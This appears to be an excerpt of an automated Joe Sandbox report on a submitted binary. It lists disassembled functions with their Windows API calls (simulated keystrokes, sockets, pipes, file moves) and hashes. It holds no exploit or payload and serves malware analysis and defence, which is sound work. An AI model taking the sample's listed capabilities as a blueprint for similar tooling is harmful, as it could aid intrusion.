                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                  • String ID:
                                                  • API String ID: 4196846111-0
                                                  • Opcode ID: dcb35229f55ada9878297251ed4eacba627fb7959fbdb64a5b43c0e4cdf33303
                                                  • Instruction ID: 04ef5dbdc4092798783da52d09f90819fa6a0887b4b9faafcb2c7233c7c05c4a
                                                  • Opcode Fuzzy Hash: dcb35229f55ada9878297251ed4eacba627fb7959fbdb64a5b43c0e4cdf33303
                                                  • Instruction Fuzzy Hash: B8718F35A00616EFCB10DFA4D855AAEBBF6FF88310F108459E916AB351D735EE428F90
                                                  Function 005FAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 005FAEF9
                                                  • GetKeyboardState.USER32(?), ref: 005FAF0E
                                                  • SetKeyboardState.USER32(?), ref: 005FAF6F
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 005FAF9D
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 005FAFBC
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 005FAFFD
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005FB020
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 4fba668e2b94e9c22a74682e9500285fc808d4ae4b4bf33d08b1993006cd8959
                                                  • Instruction ID: 82979c305cb676808aa7380a2d17199d984567f9d836d09b04d05e20bc823b81
                                                  • Opcode Fuzzy Hash: 4fba668e2b94e9c22a74682e9500285fc808d4ae4b4bf33d08b1993006cd8959
                                                  • Instruction Fuzzy Hash: E35191E06047D97DFB364234CC49BBA7EA97B06304F088589E2D9598C3D79DA8C4D752
                                                  Function 005FACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 005FAD19
                                                  • GetKeyboardState.USER32(?), ref: 005FAD2E
                                                  • SetKeyboardState.USER32(?), ref: 005FAD8F
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005FADBB
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005FADD8
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005FAE17
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005FAE38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 59885ad6cb8c219ffd16512a0582419b45835211e6a02ca29f9d26387195ec43
                                                  • Instruction ID: 74e9809756019a84a420ff50e995e508a50328eb13a3b5ce38d7e4afd16c6702
                                                  • Opcode Fuzzy Hash: 59885ad6cb8c219ffd16512a0582419b45835211e6a02ca29f9d26387195ec43
                                                  • Instruction Fuzzy Hash: E051B1E15447D93DFB368324CC55B7ABEA97B46300F088589E3D9868C2D298EC88D763
                                                  Function 005C542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(005D3CD6,?,?,?,?,?,?,?,?,005C5BA3,?,?,005D3CD6,?,?), ref: 005C5470
                                                  • __fassign.LIBCMT ref: 005C54EB
                                                  • __fassign.LIBCMT ref: 005C5506
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,005D3CD6,00000005,00000000,00000000), ref: 005C552C
                                                  • WriteFile.KERNEL32(?,005D3CD6,00000000,005C5BA3,00000000,?,?,?,?,?,?,?,?,?,005C5BA3,?), ref: 005C554B
                                                  • WriteFile.KERNEL32(?,?,00000001,005C5BA3,00000000,?,?,?,?,?,?,?,?,?,005C5BA3,?), ref: 005C5584
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: 5aa7097cd44f19a4a86a9c8c729202ccca0619a13ade4e35995589ebdd2272ce
                                                  • Instruction ID: cdb58cecef225c2c75c977c50c52affaa9dfdec230b6a12df419d3b3b3312cb6
                                                  • Opcode Fuzzy Hash: 5aa7097cd44f19a4a86a9c8c729202ccca0619a13ade4e35995589ebdd2272ce
                                                  • Instruction Fuzzy Hash: 2A518171A00649AFDB10CFE8D845FEEBBF9FB09310F14451EE955E7291E670AA81CB60
                                                  Function 006110B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0061304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
                                                    • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00611112
                                                  • WSAGetLastError.WSOCK32 ref: 00611121
                                                  • WSAGetLastError.WSOCK32 ref: 006111C9
                                                  • closesocket.WSOCK32(00000000), ref: 006111F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 2675159561-0
                                                  • Opcode ID: 40ceadee83ae6e484894447ef2b261477f33bc6b9caaa84da24d3650696e2b86
                                                  • Instruction ID: 27060d18d3baa446c132a627b987138fe24ddd2bf7b39c528f4da9d4867b1ef0
                                                  • Opcode Fuzzy Hash: 40ceadee83ae6e484894447ef2b261477f33bc6b9caaa84da24d3650696e2b86
                                                  • Instruction Fuzzy Hash: FC41C431600614AFDB109F14C845BE9BBEBFF46324F188059FA159F391D774AD82CBA1
                                                  Function 005FCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FCF22,?), ref: 005FDDFD
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FCF22,?), ref: 005FDE16
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 005FCF45
                                                  • MoveFileW.KERNEL32(?,?), ref: 005FCF7F
                                                  • _wcslen.LIBCMT ref: 005FD005
                                                  • _wcslen.LIBCMT ref: 005FD01B
                                                  • SHFileOperationW.SHELL32(?), ref: 005FD061
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 3164238972-1173974218
                                                  • Opcode ID: 8c18a969e465e3daaaf3d728698fa66de2c45f3e84063c22e6798d6e1310b28f
                                                  • Instruction ID: 721b9bf96aa80ad3e2004534d19dfe21db0ad3dad4d4911dca775c66504efdc8
                                                  • Opcode Fuzzy Hash: 8c18a969e465e3daaaf3d728698fa66de2c45f3e84063c22e6798d6e1310b28f
                                                  • Instruction Fuzzy Hash: 2D41467194521D5FDF12EBA4CA85EEEBFB9BF48340F1000E6E605EB151EA38A749CB50
                                                  Function 00622DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00622E1C
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00622E4F
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00622E84
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00622EB6
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00622EE0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00622EF1
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00622F0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: e8373657cf3c107ce3e2913424263b64902c2e9e5747e232cf348a1bbd7294e5
                                                  • Instruction ID: 0e52510768787a27d6b186d80820827371f164e6e6241ebe17d5eb311a099aa8
                                                  • Opcode Fuzzy Hash: e8373657cf3c107ce3e2913424263b64902c2e9e5747e232cf348a1bbd7294e5
                                                  • Instruction Fuzzy Hash: C5311930644562AFDB20CF18EC94FA537E2FB5A720F1A5164F5408F2B1CBB1A841EF01
                                                  Function 005F7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7769
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F778F
                                                  • SysAllocString.OLEAUT32(00000000), ref: 005F7792
                                                  • SysAllocString.OLEAUT32(?), ref: 005F77B0
                                                  • SysFreeString.OLEAUT32(?), ref: 005F77B9
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 005F77DE
                                                  • SysAllocString.OLEAUT32(?), ref: 005F77EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 45e665ea8ce9cf1ba0748a191abff5a08b2c39b9a30fd12491bec4fce531eefa
                                                  • Instruction ID: 46be998e37008ce2a3cac03b7f9e61c8b6fa99a895b51a968ba310e355d996ef
                                                  • Opcode Fuzzy Hash: 45e665ea8ce9cf1ba0748a191abff5a08b2c39b9a30fd12491bec4fce531eefa
                                                  • Instruction Fuzzy Hash: E8219F7661561DAFDB10AFA8CC88CBF7BEDFB093647108425FA14DB150D6749C428BA0
                                                  Function 005F77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7842
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7868
                                                  • SysAllocString.OLEAUT32(00000000), ref: 005F786B
                                                  • SysAllocString.OLEAUT32 ref: 005F788C
                                                  • SysFreeString.OLEAUT32 ref: 005F7895
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 005F78AF
                                                  • SysAllocString.OLEAUT32(?), ref: 005F78BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 9394810d19769ae18bafbab574bf31ed7a5f4554a874247cc3eb33869783aa03
                                                  • Instruction ID: 4c53502cee08008c50f245921898602666e99e6f76ba93f11580eefabb6d7c2d
                                                  • Opcode Fuzzy Hash: 9394810d19769ae18bafbab574bf31ed7a5f4554a874247cc3eb33869783aa03
                                                  • Instruction Fuzzy Hash: 6A214F31604509AFDB20ABA8DC89DBA7BEDFB097A07108525BA15CB2A1D664DC41CB64
                                                  Function 006004D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 006004F2
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0060052E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateHandlePipe
                                                  • String ID: nul
                                                  • API String ID: 1424370930-2873401336
                                                  • Opcode ID: 13ec54d6545b3bd062c66e38eb38474f8282ffb3f9cdaa8706ec1d93aee2c5b4
                                                  • Instruction ID: a8114c37e08009d69f1d8e4f88a2cae97068065a2f96067d3d1cc9e18608990d
                                                  • Opcode Fuzzy Hash: 13ec54d6545b3bd062c66e38eb38474f8282ffb3f9cdaa8706ec1d93aee2c5b4
                                                  • Instruction Fuzzy Hash: 18218BB5540706EBEB258F29DD04B9B7BB6EF44724F204A29F8A1D72E0D7709941CF20
                                                  Function 006005A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 006005C6
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600601
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateHandlePipe
                                                  • String ID: nul
                                                  • API String ID: 1424370930-2873401336
                                                  • Opcode ID: 57185594218a62b70e93e9590f5d8d4be2602b7a182288b76d0eda4693eeb99e
                                                  • Instruction ID: 53b0fd826b3165195b65efbb02c7ea3fd85459bf4d858c96d875e862aab3a1f9
                                                  • Opcode Fuzzy Hash: 57185594218a62b70e93e9590f5d8d4be2602b7a182288b76d0eda4693eeb99e
                                                  • Instruction Fuzzy Hash: 29219F355407069BEB288F68DC04B9B77A6AF85730F200A19F8A1E33E0DB719961CB10
                                                  Function 006240AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0059600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                                                    • Part of subcall function 0059600E: GetStockObject.GDI32(00000011), ref: 00596060
                                                    • Part of subcall function 0059600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00624112
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0062411F
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0062412A
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00624139
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00624145
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 793f07dcebd4fd1c7c70a0e0dd92eb28ea8c9bde52732fcc94aa56aad85a5a22
                                                  • Instruction ID: 82018372e2c8078b90cf3b2bb10c6135a029b2ad2a0a1d4909b29a0b1cd275c9
                                                  • Opcode Fuzzy Hash: 793f07dcebd4fd1c7c70a0e0dd92eb28ea8c9bde52732fcc94aa56aad85a5a22
                                                  • Instruction Fuzzy Hash: 6411B6B114022A7EEF118F64DC85EE77F5EEF09798F014110FA18A6190CB729C61DBA4
                                                  Function 005CD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005CD7A3: _free.LIBCMT ref: 005CD7CC
                                                  • _free.LIBCMT ref: 005CD82D
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005CD838
                                                  • _free.LIBCMT ref: 005CD843
                                                  • _free.LIBCMT ref: 005CD897
                                                  • _free.LIBCMT ref: 005CD8A2
                                                  • _free.LIBCMT ref: 005CD8AD
                                                  • _free.LIBCMT ref: 005CD8B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                  • Instruction ID: 4559227e852571de5d378b20d686de9cd7515b32df9452a89f1d60aff7aadb10
                                                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                  • Instruction Fuzzy Hash: 9C11E771540B05AED621BFF0CC4AFCB7FE8FF84700F405829B29DE6892DA79A5458660
                                                  Function 005FDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005FDA74
                                                  • LoadStringW.USER32(00000000), ref: 005FDA7B
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005FDA91
                                                  • LoadStringW.USER32(00000000), ref: 005FDA98
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005FDADC
